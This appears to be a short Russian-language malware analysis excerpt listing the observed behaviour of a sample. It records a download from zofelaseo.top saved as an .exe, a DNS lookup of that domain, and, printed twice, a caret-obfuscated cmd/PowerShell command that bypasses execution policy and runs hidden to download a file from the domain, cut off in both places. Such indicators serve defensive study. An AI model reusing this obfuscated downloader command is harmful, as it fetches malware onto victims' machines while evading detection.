Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWerSHe^l^L.^EXE ^-e^x^e^C^U^T^ion^p^oLicy^ BY^P^Ass -^No^pR^ofil^e^ -^Wind^Ow^sTYL^e ^HiDDeN^ (new-oBjeCT ^Sys^TEm^.^nEt.We^bC^li^eN^t)^.^dO^WnlOAD^FILe('http://zofelaseo.top/...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /C "p^oWerSHe^l^L.^EXE ^-e^x^e^C^U^T^ion^p^oLicy^ BY^P^Ass -^No^pR^ofil^e^ -^Wind^Ow^sTYL^e ^HiDDeN^ (new-oBjeCT ^Sys^TEm^.^nEt.We^bC^li^eN^t)^.^dO^WnlOAD^FILe('http://zofelaseo.top/...' (со скрытым окном)